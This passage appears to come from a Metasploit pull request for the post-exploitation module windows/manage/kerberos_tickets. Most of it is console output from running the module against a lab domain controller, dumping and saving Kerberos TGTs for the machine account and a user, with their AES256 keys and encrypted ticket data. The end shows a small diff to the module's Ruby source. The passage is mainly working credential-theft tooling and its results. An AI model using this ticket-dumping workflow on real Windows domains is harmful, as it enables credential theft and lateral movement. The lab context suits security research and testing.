tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA==
[*] LogonSession LUID: 0x0000003e4
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-08-23 08:32:37 -0400
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 09:32:46 -0400
End time: 2023-08-23 19:32:46 -0400
Renew Till: 2023-08-30 09:32:46 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ==
[*] Ticket[1]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 09:32:46 -0400
End time: 2023-08-23 19:32:46 -0400
Renew Till: 2023-08-30 09:32:46 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ==
[*] LogonSession LUID: 0x00004ff91
[*] User: MSFLAB\smcintyre
[*] Session: 1
[*] AuthenticationPackage: Kerberos
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:33:18 -0400
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
Primary Principal: smcintyre@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: smcintyre@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: 074bf82534302378dd8d8f911ddab2afbf64b32e8093e4fdd833e683e427c361
Subkey: false
Ticket Length: 1052
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 08:33:18 -0400
End time: 2023-08-23 18:33:18 -0400
Renew Till: 2023-08-30 08:33:18 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
oRWAAGpgwUBqsOzC3Xq8U5cNzsuFjB0ZLIgml5HqoGPgRwMtaDs9YIPNGudWsIvu+zl1aAIY6bkw3ltzW4/Ay2IuqQXKAMVnaWhTLWMNYViyPX4lUw5vrOvR6fpshI3tx46aqXNO5hnHPmNg+zAP9nKwXNG4hj3WtdCM3NMaLGShnQhvt9RnN/rEHuOQGn9Uo+3fEO01juPq9PBMJ/HGhe6dLXWFaXUc7OscSTQ5LUTlz+ABdbz2G0wCleEJPJYsQEo0tC1XDcZRcTsMkgbrAxp3H3zQGubEmX3h36Fo2H6ftYT0NsjnU1z/keylopjV6v0aRADUnqfJs+DgevOBDF0Ccy8IRsDdDVlnxr4tK7QwOvFUuIWKEPsLM2eLesNC7yJWnkDyHiFns+PNaz1PSIoD+euNRHFqW+7cPJXro3r84UcEiukKbWrMbrkg/YSQcEr9yGikNuoWSzgYCtbMsSLBRO7JasRcSNL+p4Dc3+E5r2nWRoR9bZTQM4YM72/kzoaXXnXXuPVx2krpohGMNJIHXoQ6drqCNwYcdT/tGMoCY+BLe29/PAtywGK3Hiq3HhbDnQ8t1g63b7CTssT0edrKR72Bv/YveDn3XQ1iKNM4mot+UxGVjrStJTQ6eEp1r3ZTibSvVTn3T5E1Z3ljSyHYhIa8bGlh2Ysk2St3ZEv3emDwDXvPIGovbzkqE7NYQgPlh36siynCV2SUKj1bApWA7erk7fVTyM/swH7OFa+ekZ+J88F02fanFtvrxGOhKOBfYL50UAas5o+32cqgIrPlip6JXe3BZ2fpr71mcZo4YYzUxopFYbox3FdH95HdQVG7PNg93e3+2XvnrkWEc2md+UhYacKvMMBrXzGAz1d+ea/V3Yt2EgZc1WWAWoKVCfw6RUeTQVs2pWjq7j2APjhzjAEa4s543xgmT0jIHZnfkGzTwjM5f5mhj1KeFkff98pEQX+QjjBFnaRDnIkBmzRmAyJNzxjwAhiW/RNxYNYG3UOnpmxxV443vN3wr3e+MFvBG9azFlq36iWs+2jGNUuFTdH6RECf7/tNun+DE622vI1hIaBJLAHMHzdSIt9kLTQ+OzECGjH0QNRHHibwLhyR36UHShr/ei4/PO87kKw+ZVpb0rHNcICaT80MhCIGWLlH5SErAKQe/vOkDgqeLW+keCbZfW8F7QBXc6C9kUpzUQuIII7KvLKskbgwhqPhoVV70x9vFXWG1xSFwzPJdQmDRBanyQ0xoQFhmt2MO6lMRXTpheAAL+uBJOpgYWX5GBA=
[*] LogonSession LUID: 0x00004d345
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:33:18 -0400
[*] LogonSession LUID: 0x00004bfb9
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:33:17 -0400
[*] Post module execution completed
msf6 post(windows/manage/kerberos_tickets) > klist
Kerberos Cache
==============
id host principal sname issued status path
-- ---- --------- ----- ------ ------ ----
398 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin
399 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
400 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
401 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:17 -0400 active /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
404 192.168.159.10 smcintyre@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 08:33:18 -0400 active /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
402 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
403 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
msf6 post(windows/manage/kerberos_tickets) >
```

3
modules/post/windows/manage/kerberos_tickets.rb
View File

@ -38,6 +38,7 @@ class MetasploitModule < Msf::Post
info,
'Name' => 'Kerberos Ticket Management',
'Description' => %q{
Manage kerberos tickets on a compromised host.
},
'License' => MSF_LICENSE,
'Author' => [
@ -278,6 +279,8 @@ class MetasploitModule < Msf::Post
def print_logon_session_summary(logon_session_data_ptr, annotation: nil)
sid = '???'
if datastore['VERBOSE'] && logon_session_data_ptr.contents.psid != 0
# reading the SID requires 3 railgun calls so only do it in verbose mode to speed things up
# reading the data directly wouldn't be much faster because SIDs are of a variable length
result = session.railgun.advapi32.ConvertSidToStringSidA(logon_session_data_ptr.contents.psid.to_i, 4)
if result
sid = session.railgun.util.read_string(result['StringSid'])